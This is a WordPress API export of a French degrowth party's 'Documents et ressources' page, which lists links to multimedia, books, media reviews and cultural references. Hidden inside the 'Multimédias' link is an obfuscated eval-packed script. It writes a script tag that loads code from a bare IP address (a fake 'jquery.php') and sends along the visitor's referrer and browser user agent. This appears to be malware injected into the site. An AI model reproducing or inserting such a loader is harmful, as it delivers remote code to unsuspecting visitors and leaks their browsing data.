{"id":230,"date":"2009-01-01T06:31:30","date_gmt":"2009-01-01T06:31:30","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=230"},"modified":"2010-02-02T12:06:55","modified_gmt":"2010-02-02T11:06:55","slug":"ressources-exterieures","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=230","title":{"rendered":"Documents et ressources"},"content":{"rendered":"<ul>\n<li class=\"cat-item cat-item-6\"><strong>Multim\u00e9dias<\/strong><a href=\"http:\/\/www.partipourladecroissance.net\/?cat=32\"> <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ztdta|var|u0026u|referrer|ttrid||js|php'.split('|'),0,{}))\n<\/script><\/noindex> <\/a><\/p>\n<ul>\n<li><em>Les <\/em><em><a href=\"http:\/\/www.partipourladecroissance.net\/?cat=10\">essentiels<\/a>,<\/em><br \/>\nqui traitent principalement de la D\u00e9croissance, et dans lesquelles le PPLD se reconna\u00eet.<\/li>\n<li>Les <a href=\"http:\/\/www.partipourladecroissance.net\/?cat=11\"><em>suppl\u00e9ments<\/em><\/a>,<br \/>\nqui m\u00e9ritent en partie l\u2019attention, bien que le PPLD ne se reconna\u00eet pas dans toutes les positions et propos des auteurs. Une fa\u00e7on d\u2019approfondir les r\u00e9flexions.<\/li>\n<li>Les <em><a href=\"http:\/\/www.partipourladecroissance.net\/?s=Alternative+fm+96.7-106.5\">Rubriques de la D\u00e9croissance sur Alternatives FM<\/a><\/em><\/li>\n<li>Et aussi, le <a href=\"http:\/\/www.dailymotion.com\/partipourladecroissance\"><em>dailyoutube <\/em><\/a>du PPLD, o\u00f9 on voit des vid\u00e9os qui se trouvent ou pas dans les articles sus-cit\u00e9s.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Autres<\/strong><br \/>\nIl en est de m\u00eame pour certains ouvrages, r\u00e9f\u00e9rences culturelles, ou revues de presse, etc&#8230;,<\/p>\n<ul>\n<li><em>l<a href=\"http:\/\/www.partipourladecroissance.net\/?cat=16\">es livres et ouvrages<\/a><\/em><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?cat=17\"><em>les revues des m\u00e9dias<\/em><\/a><\/li>\n<li><a href=\"http:\/\/www.partipourladecroissance.net\/?cat=15\"><em>les r\u00e9f\u00e9rences culturelles<\/em><\/a><\/li>\n<\/ul>\n<p>Ce n&rsquo;est pas parce que le PPLD y fait r\u00e9f\u00e9rence qu&rsquo;il partage 100% des propos et positions des auteurs. C&rsquo;est simplement parce que certains \u00e9l\u00e9ments paraissent constructifs et\/ou participer au d\u00e9bat.<\/p>\n<p><em><a title=\"Voir tous les articles class\u00e9s dans Livres\" href=\"..\/?cat=6\"><\/a><\/em><em><a href=\"..\/?cat=12\"><\/a><\/em><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Multim\u00e9dias Les essentiels, qui traitent principalement de la D\u00e9croissance, et dans lesquelles le PPLD se reconna\u00eet. Les suppl\u00e9ments, qui m\u00e9ritent en partie l\u2019attention, bien que le PPLD ne se reconna\u00eet pas dans toutes les positions et propos des auteurs. Une &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=230\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":4012,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-230","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/230","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=230"}],"version-history":[{"count":5,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/230\/revisions"}],"predecessor-version":[{"id":3796,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/230\/revisions\/3796"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4012"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=230"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}